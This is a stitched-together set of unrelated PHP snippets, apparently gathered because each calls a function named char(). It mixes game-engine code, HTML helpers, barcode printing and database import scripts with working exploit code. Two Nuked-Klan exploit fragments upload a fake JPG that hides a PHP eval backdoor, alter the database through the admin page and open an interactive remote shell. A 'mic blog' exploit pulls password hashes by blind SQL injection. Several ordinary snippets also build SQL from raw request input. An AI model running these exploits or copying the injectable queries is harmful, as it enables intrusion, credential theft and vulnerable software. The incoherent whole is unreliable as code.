function letterList() { for ($i = 65; $i <= 90; $i++) { $ch = char($i); echo "<option value=" . $ch . ">" . $ch . "</option>"; } }
public function get_next_practice_id() { $result = -1; if ($query = $this->db->query("SELECT MAX(practiceid) AS `prid` FROM `am_practice`;")) { if ($query->num_rows() > 0) { if ($row = $query->result()) { $result = $row[0]->prid; } } $query->free_result(); } if ($result == "" || $result == -1) { $result = "AMPR-A00001"; } else { if (Intval(substr($result, 6)) == 99999) { if (ord(substr($result, 5, 1)) == 'z') { $result = -1; } else { $val = char(ord(substr($result, 5, 1)) + 1); $result = "AMPR-" . $val . "00001"; } } else { $val = Intval(substr($result, 6)) + 1; $result = substr($result, 0, 6) . ($val < 10000 ? $val < 1000 ? $val < 100 ? $val < 10 ? "0000" . $val : "000" . $val : "00" . $val : "0" . $val : $val); } } return $result; }
function frchar($tab) { foreach ($tab as $clef => $valeur) { $tab[$clef] = char($valeur); } return $tab; }
function actionIndex() { if (!isset($_SESSION['id'])) { header("Location: /"); die; } if (!isset($_SESSION['cid'])) { header("Location: /cabinet"); die; } $main = new Templater(); $main->import("interface/game.tpl"); $main->setvar("%URL%", "http://" . $GLOBALS['url']); $main->setvar("%STORAGE_TPL_URL%", "/storage/tpl"); $main->setvar("%YEAR%", date("Y")); $main->setvar("%CSS%", "<style>" . templater("css/game.css", array("%ROOT%" => "/storage/tpl")) . "</style>"); $main->setvar("%GAME_TITLE%", $GLOBALS['name']); $main->setvar("%STORAGE_STATIC_URL%", "/storage/static"); $GLOBALS['current_loc_info'] = Database::GetOne("config", array("mod" => "locations"))[char()->map]; if (!isset($GLOBALS['current_loc_info']['type']) or $GLOBALS['current_loc_info']['type'] == 'default') { $main->setvar("%GUI%", template("interface/GUI.tpl")); } else { $GLOBALS['current_loc_type_info'] = Database::GetOne("config", array("mod" => "location_types"))[$GLOBALS['current_loc_info']['type']]; require_once MODS_ROOT . SEPARATOR . $GLOBALS['current_loc_type_info']['module'] . SEPARATOR . "location_type.php"; $main->setvar("%GUI%", isset($GLOBALS['to_gui']) ? $GLOBALS['to_gui'] : ''); } $main->setvar("%CHATBOX%", template("boxes/chat.tpl")); $main->renderEcho(); }
public function actionHandler() { $last_id = isset($_POST['last_id']) ? (int) $_POST['last_id'] : 0; $result = array(); if (!empty($_POST['text'])) { $sth = Database::Insert("chat", array('user' => char()->name, 'text' => $_POST['text'], 'date' => time())); } $sth = Database::Get("chat", array('date' => array('$gt' => $last_id)))->sort(array('date' => 1)); foreach ($sth as $o) { $result[] = $o; } echo json_encode($result); }
public static function unescape($html) { $html = preg_replace_callback('/&([#\\w]+);/', function ($n) { $n = strtolower($n); if ($n === 'colon') { return ':'; } if ($n[0] === '#') { return $n[1] === 'x' ? char(hexdec(substr($n, 2))) : char(substr($n, 1)); } return ''; }, $html); return $html; }
function porlet($porlet, $content) { $skin = path("www/lib/themes/cpanel", TRUE); $HTML = ' <div class="box"> <span class="bold grey">' . $porlet . '</span> <span class="float-right bold small grey">X</span>'; if (is_array($content)) { $HTML .= char("\t", 4) . openUl() . char("\n"); foreach ($content as $list) { $HTML .= char("\t", 5) . $list . char("\n"); } $HTML .= char("\t", 4) . closeUl() . char("\n"); } else { $HTML .= char("\t", 4) . $content . char("\n"); } $HTML .= '</div><br />'; return $HTML; }
function __call($func, $args) { $func = str_replace("action", "", $func); if ($func != 'index') { $array = Database::GetOne("characters", array("name" => $func)); } else { $array = Database::GetOne("characters", array("_id" => toId($_SESSION['cid']))); $func = $array['name']; } if (!isset($array['name'])) { die("<h1>Персонаж " . $func . " не найден</h1>"); } $params = Database::GetOne("config", array("mod" => "params")); $main = new Templater(); $main->import("interface/playerinfo.tpl"); $main->setvar("%URL%", "http://" . $GLOBALS['url']); $main->setvar("%STORAGE_TPL_URL%", "/storage/tpl"); $main->setvar("%YEAR%", date("Y")); $main->setvar("%CSS%", "<style>" . templater("css/game.css", array("%ROOT%" => "/storage/tpl")) . "</style>"); $main->setvar("%GAME_TITLE%", $GLOBALS['name']); $main->setvar("%STORAGE_STATIC_URL%", "/storage/static"); $main->setvar("%GUI%", template("interface/GUI.tpl")); $main->setvar("%CHATBOX%", template("boxes/chat.tpl")); $params_all = ''; foreach ($array as $key => $value) { if (MongoReserved($key) or MongoReserved($value) or strstr($key, "p_")) { continue; } $main->setvar("%" . $key . "%", $array[$key]); } foreach ($params as $key => $value) { if (!strstr($key, "p_")) { continue; } $v = char(__toString($array['_id']))->getParam($key); $main->setvar("%" . $key . "%", $v); $params_all .= '<p><b>' . $value['name'] . '</b>: ' . $v . '</p>'; } $main->setvar("%PARAMS_ALL%", $params_all); $main->renderEcho(); }
function __call($func, $args) { $func = strtolower(str_replace("action", "", $func)); if (!file_exists(CACHE_ROOT . SEPARATOR . "installed.cache") and $func != 'install') { header("Location: /admin/install"); die; } if (char()->admin < 1 and !in_array($func, char()->perms) and file_exists(CACHE_ROOT . SEPARATOR . "installed.cache")) { die("403 Forbidden"); } if (!isset($_SESSION['cid']) and file_exists(CACHE_ROOT . SEPARATOR . "installed.cache")) { die("403 Forbidden"); } include_once ADMIN_ROOT . SEPARATOR . ""; if (strstr($func, 'ext_')) { include_once MODS_ROOT . SEPARATOR . trim($func, 'ext_') . SEPARATOR . trim($func, 'ext_') . ".admin.php"; } else { include_once ADMIN_ROOT . SEPARATOR . $func . ".php"; } include_once ADMIN_ROOT . SEPARATOR . ""; }
private static function unban($args) { if (char()->admin <= 0) { echo "Вы не администратор"; return; } if (is_object(CharByName($args))) { CharByName($args)->ban = 0; CharByName($args)->ban_reason = "Разблокирован"; echo "Персонаж <b>" . $args . "</b> разблокирован"; } else { echo "Персонаж <b>" . $args . "</b> не существует"; } }
function li($list, $open = null) { $HTML = null; if (isMultiArray($list)) { foreach ($list as $li) { $class = isset($li["class"]) ? ' class="' . $li["class"] . '"' : null; if (isset($li["item"]) and strlen($li["item"]) > 1) { $HTML .= '<li' . $class . '>' . $li["item"] . '</li>'; } } } elseif (is_array($list)) { for ($i = 0; $i <= count($list) - 1; $i++) { $HTML .= char("\t", 2) . '<li>' . $list[$i] . '</li>'; } } elseif ($list and $open) { $HTML .= "<li>" . $list; } elseif ($open === false) { $HTML .= "</li>"; } else { $HTML .= '<li>' . $list . '</li>'; } return $HTML; }
<a href="#" class="dropdown-toggle" data-toggle="dropdown"><i class="fa fa-bell"></i> <b class="caret"></b></a> <ul class="dropdown-menu alert-dropdown"> <li> <a href="/admin/errors">Показать все ошибки</a> </li> </ul> </li> <li class="dropdown"> <a href="#" class="dropdown-toggle" data-toggle="dropdown"><i class="fa fa-user"></i> <?php echo char()->name; ?> <b class="caret"></b></a> <ul class="dropdown-menu"> <li> <a href="/player/<?php echo char()->name; ?> "><i class="fa fa-fw fa-user"></i>Мой профиль</a> </li> <li> <a href="/admin/reports"><i class="fa fa-fw fa-envelope"></i> Репорты</a> </li> <li> <a href="/admin/config"><i class="fa fa-fw fa-gear"></i> Настройки</a> </li> <li class="divider"></li> <li> <a href="/cabinet?logout=1"><i class="fa fa-fw fa-power-off"></i>Выход</a> </li> </ul> </li>
<?php /* @last_edit 22.08.2015 @last_autor Mike @comment Пример типа локаций */ if (!isset($GLOBALS['current_loc_info']['map'])) { $GLOBALS['to_gui'] = '<h3>Возникла ошибка при получении данных локации</h3>'; } if (isset($_GET['teleport'])) { char()->map = $_GET['teleport']; die("<script>location.href = '?';</script>"); } $GLOBALS['to_gui'] = ''; parse_str($GLOBALS['current_loc_info']['map'], $info); $GLOBALS['to_gui'] = '<img src="' . $info['image'] . '"><h4>Перейти: </h4>'; foreach ($info as $key => $value) { if ($key == 'image') { continue; } $GLOBALS['to_gui'] .= '<p><li><a href="?teleport=' . $value . '">' . $key . '</a></li></p>'; }
$xpl->addcookie($config[1] . '_' . $name[1], $matches[2][2]); $xpl->addcookie($config[1] . '_' . $name[2], $matches[2][3]); $phpc = array(frmdt_url => $url . '?file=User&op=update_pref', 'fichiernom' => array(frmdt_filename => '1.jpg', frmdt_content => $config[4])); $xpl->addheader('Referer', $url); $xpl->formdata($phpc); $xpl->get($url . '?file=User&op=edit_pref'); if (!preg_match('#\\<input name=\\"photo\\" value=\\"(\\S+)\\"#', $xpl->getcontent(), $match)) { exit("\nNo file found"); } else { print "\n\$shell> "; } $sql = array(); $sql[] = "ALTER TABLE {$config['0']}_block CHANGE `type` `type` VARCHAR(60) CHARACTER SET latin1 COLLATE latin1_swedish_ci NOT NULL DEFAULT 0;"; /* $sql[] = "UPDATE $config[0]_config SET avatar_upload=".char('on')." WHERE name=".char('avatar_upload').";";*/ $sql[] = "UPDATE {$config['0']}_block SET type=" . char('/../../../' . $match[1] . "") . " WHERE bid=1;"; $sql[] = "DELETE FROM {$config['0']}_nbconnecte;"; for ($i = 0; $i < count($sql); $i++) { $xpl->post($url . '?file=Admin&page=mysql&op=upgrade_db', 'upgrade=' . $sql[$i]); } while (!preg_match("#^(quit|exit)\$#", $cmd = trim(fgets(STDIN)))) { # 0'); include('./'); print $global['db_pass']; // $xpl->reset('header'); $xpl->addheader('Shell', "system('{$cmd}');"); $xpl->get($url); $data = explode('123456789', $xpl->getcontent()); print $data[1] . "\n\$shell> "; } function char($data) { $char = 'CHAR(';
/** * Implements barcodes 1D * * @param int $type Default CODE128 * @param int $height * @param int $lineWidth * @param string $txtPosition * @param string $txtFont * @param string $data */ public function barcode($data = '123456', $type = 'CODE128', $height = 162, $lineWidth = 2, $txtPosition = 'none', $txtFont = '') { if ($this->printerMode == 'ESCPOS') { parent::barcode($data, $type, $height, $lineWidth, $txtPosition, $txtFont); return; } if (!($data = Barcodes\Barcode1DAnalysis::validate($data, $type))) { throw new \InvalidArgumentException('Data or barcode type is incorrect.'); } if (!array_key_exists($type, $this->barcode1Dlist)) { throw new \InvalidArgumentException('This barcode type is not listed.'); } $n = strlen($data); $id = $this->barcode1Dlist[$type]; $height = self::validateInteger($height, 50, 200, 50); $lineWidth = self::validateInteger($lineWidth, 2, 5, 2); $n4 = 0; if ($txtPosition != 'none') { $n4 = 1; } switch ($type) { case 'UPC_A': $this->buffer->write(self::GS . 'kA' . self::VT . $data); break; case 'UPC_E': $this->buffer->write(self::GS . 'kB' . self::ACK . $data); break; case 'EAN13': $this->buffer->write(self::GS . 'kC' . self::FF . $data); break; case 'EAN8': $this->buffer->write(self::GS . 'kD' . self::BEL . $data); break; case 'CODE39': $this->buffer->write(self::GS . 'kE' . char($n) . $data); break; case 'I25': $this->buffer->write(self::GS . 'kF' . char($n) . $data); break; case 'CODABAR': $this->buffer->write(self::GS . 'kG' . char($n) . $data); break; case 'CODE93': $this->buffer->write(self::GS . 'kH' . char($n) . $data); break; case 'CODE128': $this->buffer->write(self::GS . 'kI' . char($n) . $data); break; case 'ISBN': $this->buffer->write(self::GS . 'k' . self::NAK . $data . self::NUL); break; case 'MSI': $this->buffer->write(self::GS . 'k' . self::SYN . $data . self::NUL); break; } }
function ul($list, $ID = NULL, $class = NULL) { $ID = !is_null($ID) ? ' id="' . $ID . '"' : NULL; $class = !is_null($class) ? ' class="' . $class . '"' : NULL; $HTML = '<ul' . $ID . $class . '>' . char("\t"); if (isMultiArray($list)) { foreach ($list as $li) { $class = isset($li["class"]) ? ' class="' . $li["class"] . '"' : NULL; $HTML .= char("\t", 2) . '<li' . $class . '>' . $li["item"] . '</li>' . char("\n"); } } elseif (is_array($list)) { for ($i = 0; $i <= count($list) - 1; $i++) { $HTML .= char("\t", 2) . '<li>' . $list[$i] . '</li>' . char("\n"); } } $HTML .= char("\t") . '</ul>' . char("\n"); return $HTML; }
// 'à', 'â', 'ä', 'á', 'ã', 'å', // 'î', 'ï', 'ì', 'í', // 'ô', 'ö', 'ò', 'ó', 'õ', 'ø', // 'ù', 'û', 'ü', 'ú', // 'é', 'è', 'ê', 'ë', // 'ç', 'ÿ', 'ñ', // ), // array( // 'a', 'a', 'a', 'a', 'a', 'a', // 'i', 'i', 'i', 'i', // 'o', 'o', 'o', 'o', 'o', 'o', // 'u', 'u', 'u', 'u', // 'e', 'e', 'e', 'e', // 'c', 'y', 'n', // ), // $string // ); // return $string; // } //indentifiant de la BD $connexion = new PDO('mysql:host=localhost;dbname=applichauffeur;charset=utf8', 'root', ''); //on ouvre les fichiers dans un tableau $communes = file('./ville.txt'); //boucle pour lire toutes les case for ($i = 0; $i < 100; $i++) { //on recupére la case de du tableau pour les tests echo char($i . "||" . $communes[$i] . "</br> "); $com = char($communes[$i]); //on envoi les infos de $ligne sur la bdd $connexion->exec("INSERT INTO COMMUNE(VILNOM) VALUES (\"{$com}\");"); }
function packLineStyleAray($linestyleCount, $linestyles) { array_push($this->pushpop, "packLineStyleAray"); $linestyleCount < 0xff ? $atom = $this->packUI8($linestyleCount) : ($atom .= char(0xff) . $this->packUI16($linestyleCount)); $atom .= $linestyles; array_pop($this->pushpop); return $atom; }
<?php $msg = ''; $msgLen = (int) strlen($msg); $iTam1 = $msgLen; $item2 = 0; if ($msgLen > 255) { $iTam1 = (int) $msgLen % 255; $iTem2 = (int) $msgLen / 255; } $centraliza = chr(27) . chr(97) . chr(1); $qrcode = chr(29) . chr(107) . char(81) . chr(2) . chr(12) . chr($msgLen) . chr(1) . chr($iTam1) . chr($iTam2) . $msg; // aqui começa o texto $cutcommand = chr(27) . chr(119); // acionamento da Guilhotina.
{ $rast = str_replace("à", "chr224", $data); $rast = str_replace("é", "chr233", $rast); $rast = str_replace("è", "chr232", $rast); $rast = str_replace("ê", "chr234", $rast); $rast = str_replace("â", "chr226", $rast); $rast = str_replace("ç", "chr231", $rast); $rast = str_replace("ô", "chr244", $rast); $rast = str_replace("î", "chr238", $rast); $rast = str_replace("û", "chr251", $rast); return $rast; } if ($_GET['objkey'] == "schema") { $result = "SELECT pn.nspname as col FROM pg_catalog.pg_namespace pn WHERE nspname NOT LIKE 'pg_%' AND nspname != 'information_schema' ORDER BY nspname"; } else { if ($_GET['objkey'] == "contenu") { $result = "SELECT libelle_them||'.'||idtheme as col FROM admin_svg.theme order by libelle_them asc"; } else { $test_table = explode("|", $_GET['objkey']); if ($test_table[0] == "table") { $result = "SELECT c.relname as col FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE (c.relkind = 'r' or (c.relkind = 'v')) AND nspname='" . $test_table[1] . "' ORDER BY c.relname"; } else { $result = "SELECT a.attname as col FROM pg_catalog.pg_attribute a LEFT JOIN pg_catalog.pg_attrdef adef ON a.attrelid=adef.adrelid AND a.attnum=adef.adnum LEFT JOIN pg_catalog.pg_type t ON a.atttypid=t.oid WHERE a.attrelid = (SELECT oid FROM pg_catalog.pg_class WHERE relname='" . $test_table[0] . "' AND relnamespace = (SELECT oid FROM pg_catalog.pg_namespace WHERE nspname = '" . $test_table[1] . "')) AND a.attnum > 0 AND NOT a.attisdropped ORDER BY a.attnum"; } } } $col = $DB->tab_result($result); for ($z = 0; $z < count($col); $z++) { $retour .= char($col[$z]['col']) . "#"; } echo $retour;
function apply_ws_query($connect, $sess_id, $q) { if ($sess_id != '0' and $GLOBALS['sess_data'][$sess_id]['online'] < time()) { $GLOBALS['sess_data'][$sess_id]['online'] = time() + 120; } switch ($q[0]) { case 'sid': return array('type' => 'sid', 'answer' => $sess_id); break; case "uniqid": return array('type' => 'uniqid', 'answer' => uniqid()); case 'test': return array('answer' => '1'); break; case 'teleport': $GLOBALS['sess_data'][$sess_id]['x'] = $q[1]; $GLOBALS['sess_data'][$sess_id]['y'] = $q[2]; $GLOBALS['sess_data'][$sess_id]['dir'] = $q[3]; sendAll(array('type' => 'teleport', 'char' => $GLOBALS['sess_data'][$sess_id]['cid'], 'x' => $q[1], 'y' => $q[2], 'dir' => $q[3])); return array('type' => 'default', 'answer' => '1'); break; case 'clientjs': return array('type' => 'clientjs', 'answer' => rpgjs_getcmd($q[1])); break; case 'getposition': if (!isset($GLOBALS['sess_data'][$sess_id]['x']) or !isset($GLOBALS['sess_data'][$sess_id]['y']) or !isset($GLOBALS['sess_data'][$sess_id]['dir'])) { $GLOBALS['sess_data'][$sess_id]['x'] = char($GLOBALS['sess_data'][$sess_id]['cid'])->pos_x; $GLOBALS['sess_data'][$sess_id]['y'] = char($GLOBALS['sess_data'][$sess_id]['cid'])->pos_y; $GLOBALS['sess_data'][$sess_id]['dir'] = char($GLOBALS['sess_data'][$sess_id]['cid'])->dir; $GLOBALS['sess_data'][$sess_id]['loc'] = char($GLOBALS['sess_data'][$sess_id]['cid'])->map; } return array('type' => 'getposition', 'x' => $GLOBALS['sess_data'][$sess_id]['x'], 'y' => $GLOBALS['sess_data'][$sess_id]['y'], 'loc' => $GLOBALS['sess_data'][$sess_id]['map'], 'dir' => $GLOBALS['sess_data'][$sess_id]['dir']); break; case 'online': $array = array('type' => 'online'); foreach ($GLOBALS['sess_data'] as $key => $value) { if ($value['online'] < time()) { continue; } $array[$value['_id']]['id'] = $value['_id']; $array[$value['_id']]['x'] = $value['x']; $array[$value['_id']]['y'] = $value['y']; $array[$value['_id']]['dir'] = $value['dir']; $array[$value['_id']]['name'] = $value['name']; $array[$value['_id']]['online'] = $value['online']; $array[$value['_id']]['map'] = $value['map']; $array[$value['_id']]['skin'] = $value['skin']; } return $array; break; case 'events': return array('type' => 'events', 'answer' => implode(" ", array_values(check_player_events($GLOBALS['sess_data'][$sess_id]['cid'], true, true)['js']))); break; case 'mapchars': $array = array('type' => 'mapchars'); foreach ($GLOBALS['sess_data'] as $key => $value) { if ($value['map'] != $q[1] or $GLOBALS['sess_data'][$sess_id]['cid'] == $value['_id']) { continue; } $array[$value['_id']]['id'] = $value['_id']; $array[$value['_id']]['x'] = $value['x']; $array[$value['_id']]['y'] = $value['y']; $array[$value['_id']]['dir'] = $value['dir']; $array[$value['_id']]['name'] = $value['name']; $array[$value['_id']]['online'] = $value['online']; $array[$value['_id']]['map'] = $value['map']; $array[$value['_id']]['skin'] = $value['skin']; } return $array; break; case 'exists': return array('type' => 'default', 'error' => 'Deprecated method. Use API.'); break; default: return array('type' => 'default', 'error' => 'Bad query ID (' . $q[0] . ')'); break; } }
function packLINESTYLEARRAY($LineStyleCount, $LineStyles) { array_push($this->FMDebug, "packLINESTYLEARRAY"); if ($LineStyleCount < 0xff) { $atom = $this->packUI8($LineStyleCount); } else { $atom .= char(0xff) . $this->packUI16($LineStyleCount); } $atom .= $LineStyles; array_pop($this->FMDebug); return $atom; }
// array( // 'à', 'â', 'ä', 'á', 'ã', 'å', // 'î', 'ï', 'ì', 'í', // 'ô', 'ö', 'ò', 'ó', 'õ', 'ø', // 'ù', 'û', 'ü', 'ú', // 'é', 'è', 'ê', 'ë', // 'ç', 'ÿ', 'ñ', // ), // array( // 'a', 'a', 'a', 'a', 'a', 'a', // 'i', 'i', 'i', 'i', // 'o', 'o', 'o', 'o', 'o', 'o', // 'u', 'u', 'u', 'u', // 'e', 'e', 'e', 'e', // 'c', 'y', 'n', // ), // $string // ); // return $string; // } //indentifiant de la BD $connexion = new PDO('mysql:host=localhost;dbname=appli_chf;charset=utf8', 'root', ''); //on ouvre les fichiers dans un tableau $communes = file('./ville.txt'); //boucle pour lire toutes les case for ($i = 0; $i < 100; $i++) { //on recupére la case de du tableau pour les tests echo char($i . "||" . $communes[$i] . "</br> "); //on envoi les infos de $ligne sur la bdd $connexion->exec("INSERT INTO COMMUNE(VILID, VILNOM) VALUES ({$i}, \"{$communes[$i]}\");"); }
{ echo "[?] mic blog v0.0.3 Multiple Remote Exploit\r\n\r\n"; echo "[?] (Remote\\Blind) SQL Injection\r\n"; echo "[?] Usage: php [exploit.php] [host:port] [path blog] [table prefix_user] [user id] [normal or blind]\r\n"; echo "[?] Example: php mic.php localhost:80 cms mic_user 1 normal\r\n"; echo "[?] Example: php mic.php localhost:80 cms mic_user 1 blind\r\n\r\n"; echo "[?] Remote Privilege Escalation\r\n"; echo "[?] Usage: php mic.php localhost:80 cms [username] [password] [privilege]\r\n"; echo "[?] Example: php mic.php localhost:80 cms anarchy mypasswordz privilege\r\n"; die; } $id = 0; $hash = array(0, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 97, 98, 99, 100, 101, 102); for ($i = 0; $i <= 32; $i++) { for ($j = 0; $j <= 17; $j++) { if (!eregi('modules.php', http_request($argv[1], $argv[2], char($hash[$j], $id, $argv[3], $argv[4])))) { $password .= chr($hash[$j]); $id++; } } } if (isset($password)) { echo "[?] Hash: {$password}\r\n[?] ID: {$argv['4']}\r\n"; die; } else { echo "[?] Exploit Failed!\r\n"; die; } ?> # [2008-10-16]
public static function makereport($array) { if (!isset($_POST['text'])) { $answer = json_encode(array('error' => 'Cant read text')); } if (!isset($_SESSION['cid'])) { $answer = json_encode(array('error' => 'Not logged in')); } $text = trim($_POST['text']); $text = htmlspecialchars($_POST['text']); $text = strip_tags($_POST['text']); Database::Insert("reports", array("author" => char()->name, "message" => $text, "date" => raptor_date())); $answer = json_encode(array('message' => 'Report sent')); return $answer; }
public function get_next_id($practice, $practiceprefix) { $result = -1; if ($query = $this->db->query("SELECT MAX(deviceid) AS `did` FROM `" . $practice . "_device`;")) { if ($query->num_rows() > 0) { if ($row = $query->result()) { $result = $row[0]->did; } } $query->free_result(); } if ($result == "" || $result == -1) { if ($practice == "am") { $result = "AMD-A001"; } else { $result = $practiceprefix . "D-A001"; } } else { if (Intval(substr($result, 5)) == 999) { if (ord(substr($result, 4, 1)) == 'Z') { $result = -1; } else { $val = char(ord(substr($result, 4, 1)) + 1); $result = substr($result, 0, 4) . $val . "001"; } } else { $val = Intval(substr($result, 5)) + 1; $result = substr($result, 0, 5) . ($val < 100 ? $val < 10 ? "00" . $val : "0" . $val : $val); } } return $result; }
function finalattack($admin_sid, $admin_uid) { global $url, $xpl, $mode, $prefix, $file_upload_code; print "\n[*] Admin status confirmed.\n"; # Admin Cookies $xpl->reset("cookie"); $xpl->addcookie("{$prefix}sess_id", $admin_sid); $xpl->addcookie("{$prefix}user_id", $admin_uid); $xpl->addcookie("{$prefix}admin_session", $admin_uid); print "[*] Uploading fake image ... "; /* Code in the fake avatar */ if ($mode == 0) { $c0de = '<?php' . "\n" . "error_reporting(0);" . "if(isset(\$_SERVER['HTTP_UPLOAD'])) { \$f=fopen('w00t.php','w');fputs(\$f,'" . preg_replace("#'#i", "\\'", $file_upload_code) . "');print 'upfiledone'; }\n" . 'include(\'./Includes/blocks/block_login.php\');$blok[type]=\'login\'; ?>'; } else { $c0de = '<?php' . "\n" . 'error_reporting(0);' . 'if(isset($_SERVER[HTTP_SHELL]))' . '{print 123456789;eval($_SERVER[HTTP_SHELL]);exit(123456789);}' . 'else {include(\'./Includes/blocks/block_login.php\');$blok[type]=\'login\';} ?>'; } /* This is based on DarkFig's code ( */ /* It was a little changed to permit 2 modes: upload/code exec */ $phpc = array(frmdt_url => $url . '?file=User&op=update_pref', 'fichiernom' => array(frmdt_filename => '1.jpg', frmdt_content => $c0de)); $xpl->addheader('Referer', $url); $xpl->formdata($phpc); $f = fopen("zzz.jpg", "w"); fputs($f, $c0de); fclose($f); $xpl->get($url . '?file=User&op=edit_pref'); if (!preg_match('#\\<input name=\\"photo\\" value=\\"(\\S+)\\"#', $xpl->getcontent(), $match)) { exit("error.\n"); } print "done.\n"; print "[*] Processing SQL queries ... "; $sql = array(); $sql[] = "ALTER TABLE nuked_block CHANGE `type` `type` VARCHAR(60) CHARACTER SET latin1 COLLATE latin1_swedish_ci NOT NULL DEFAULT 0;"; $sql[] = "UPDATE nuked_block SET type=" . char('/../../../' . $match[1] . "") . " WHERE bid=1;"; $sql[] = "DELETE FROM nuked_stats_visitor WHERE referer LIKE 0x25673030676c6525;"; /* added by real to delete our SQL Injection from SQL DB */ $sql[] = "DELETE FROM nuked_nbconnecte;"; for ($i = 0; $i < count($sql); $i++) { $xpl->post($url . '?file=Admin&page=mysql&op=upgrade_db', 'upgrade=' . $sql[$i]); } print "done.\n"; /* Final step: File Upload or Code Execution */ if ($mode == 0) { $xpl->addheader("Upload", "1"); $c = $xpl->get($url); if (preg_match("#upfiledone#i", $c)) { print "[*] File uploaded.\n\n"; } else { exit("[*] File upload error.\n"); } print "[*] " . $url . "w00t.php\n"; } else { print "\n\$shell> "; while (!preg_match("#^(quit|exit)\$#", $cmd = trim(fgets(STDIN)))) { $xpl->reset('header'); $xpl->addheader('Shell', "system('{$cmd}');"); $xpl->get($url); $data = explode('123456789', $xpl->getcontent()); print $data[1] . "\n\$shell> "; } } /* End of DarkFig based code */ exit; }
<a href="price4.php"> <input class="button_7"type="button"value="乳製品"> </a> <a href="price5.php"> <input class="button_8"type="button"value="炭水化物"> </a> <!--ヘッダとサイドおわり--> <!--ページごとに週を送る→-日付を得る→日付ごとのメニューを表示→-それぞれのボタンにメニューIDを→遷移先にメニューID送る→IDをもとに材料表示--> <div class=title> <?php session_start(); $list[0] = $_POST['1']; $price = SerchPrice(2.0, $_SESSION["USERID"], $list); printf("%s の価格はおよそ\\ %0.1d です", FoodID2Name($_POST['1']), $price[0]); ?> </div> <div class="chart"> <?php session_start(); $data = char(SerchTimeChart(2.0, $_SESSION["USERID"], $_POST['1'])); printf("<img src=\",10,5,5&chf=bg,s,e2e2e2&chs=500x300&chd=t:%s|%s&chxt=x,y&chxr=0,0,%fE2|1,0,%fE1&cht=lxy\">", $data[0], $data[1], (double) $data[2] / 100, (double) $data[3] / 10); ?> </div> </body> </html>
function lname_gen() { $last = array(); $long = rand(5, 7); for ($i = 0; $i < $long; $i++) { //returns random letter $char = char(); array_push($last, $char); } //end for loop //converts array into string + lowercase $name = implode($last); $lname = strtolower($name); return $lname; }
function CharByName($name) { $id = Database::GetOne("characters", array("name" => $name)); if (is_array($id)) { return char(__toString($id['_id'])); } else { return false; } }